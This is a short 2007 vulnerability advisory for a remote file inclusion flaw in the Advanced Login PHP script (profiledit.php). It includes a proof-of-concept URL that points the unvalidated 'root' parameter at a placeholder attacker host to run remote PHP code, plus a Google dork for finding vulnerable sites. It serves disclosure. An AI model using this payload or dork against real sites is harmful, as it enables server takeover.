Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability

                                                ------------------------------------------------------------------------------
Advanced&nbsp;Login&nbsp;<=&nbsp;0.7&nbsp;(root)&nbsp;Remote&nbsp;File&nbsp;Inclusion&nbsp;Vulnerability
------------------------------------------------------------------------------

Author		:&nbsp;Zeni&nbsp;Susanto&nbsp;a.k.a&nbsp;Bithedz
Date&nbsp;Found	:&nbsp;Maret,&nbsp;29th&nbsp;2007
Location	:&nbsp;Indonesia,&nbsp;Bandung
Critical&nbsp;Lvl	:&nbsp;Highly&nbsp;critical
Impact		:&nbsp;System&nbsp;access
Where		:&nbsp;From&nbsp;Remote
---------------------------------------------------------------------------

Affected&nbsp;software&nbsp;description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application	:&nbsp;AdvanceLogin
version		:&nbsp;0.7
vendor		:&nbsp;http://www.msxstudios.de
source&nbsp;url&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;http://downloads.msxstudios.de/advancedlogin076.zip

---------------------------------------------------------------------------

Description:
~~~~~~~~
Advanced&nbsp;Login&nbsp;is&nbsp;at&nbsp;present&nbsp;for&nbsp;designers&nbsp;the&nbsp;best,&nbsp;for&nbsp;programmers&nbsp;and&nbsp;successful&nbsp;Web&nbsp;masters&nbsp;one&nbsp;the&nbsp;best&nbsp;Login&nbsp;of&nbsp;systems&nbsp;on&nbsp;the&nbsp;market.&nbsp;Templates&nbsp;which&nbsp;can&nbsp;be&nbsp;edited&nbsp;through&nbsp;simply&nbsp;and&nbsp;determined&nbsp;Functions&nbsp;can&nbsp;adapt&nbsp;you&nbsp;to&nbsp;Advanced&nbsp;Login&nbsp;100%&nbsp;to&nbsp;YOUR&nbsp;Design,&nbsp;not&nbsp;as&nbsp;differently&nbsp;with&nbsp;usual&nbsp;systems&nbsp;around.&nbsp;Advanced&nbsp;Login&nbsp;is&nbsp;developed&nbsp;further&nbsp;and&nbsp;improved,&nbsp;an&nbsp;installation&nbsp;is&nbsp;constantly&nbsp;worthwhile&nbsp;themselves&nbsp;thus,&nbsp;even&nbsp;if&nbsp;the&nbsp;present&nbsp;function&nbsp;yet&nbsp;for&nbsp;your&nbsp;web&nbsp;page&nbsp;are&nbsp;not&nbsp;enough&nbsp;completely.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I&nbsp;found&nbsp;vulnerability&nbsp;script&nbsp;in&nbsp;profiledit.php

----------&nbsp;profiledit.php---------------------------------------------------------
<?php
include($root.\"login/engine/couple.php\");
mysql_query($profil_update_sql);
$result2=mysql_query($select_new_user_sql);
$row2=mysql_fetch_assoc($result2);
?>
&nbsp;
-----------------------------------------------------------------------------

Input&nbsp;passed&nbsp;to&nbsp;the&nbsp;\"root\"&nbsp;parameter&nbsp;in&nbsp;profiledit.php&nbsp;is&nbsp;not
properly&nbsp;verified&nbsp;before&nbsp;being&nbsp;used.&nbsp;This&nbsp;can&nbsp;be&nbsp;exploited&nbsp;to&nbsp;execute
arbitrary&nbsp;PHP&nbsp;code&nbsp;by&nbsp;including&nbsp;files&nbsp;from&nbsp;local&nbsp;or&nbsp;external
resources.



Proof&nbsp;Of&nbsp;Concept:
~~~~~~~~~~~~

http://target.com/login/engine/db/profiledit.php?root==http://attact.com/colok.txt?

-----------------------------------------------------------------------------

google&nbsp;d0rk:
~~~~~~~
\"Advanced&nbsp;Login&nbsp;-&nbsp;Login\"

-----------------------------------------------------------------------------
Solution:
~~~
-&nbsp;download&nbsp;new&nbsp;version&nbsp;in&nbsp;vendor&nbsp;URL&nbsp;

-----------------------------------------------------------------------------
Shoutz:
~~
~&nbsp;My&nbsp;Wife&nbsp;Monik&nbsp;
~&nbsp;K-159

-----------------------------------------------------------------------------

Contact:
~~~
&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Bithedz[at]gmail[dot]com
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
--------------------------------&nbsp;[&nbsp;EOF&nbsp;]----------------------------------

&nbsp;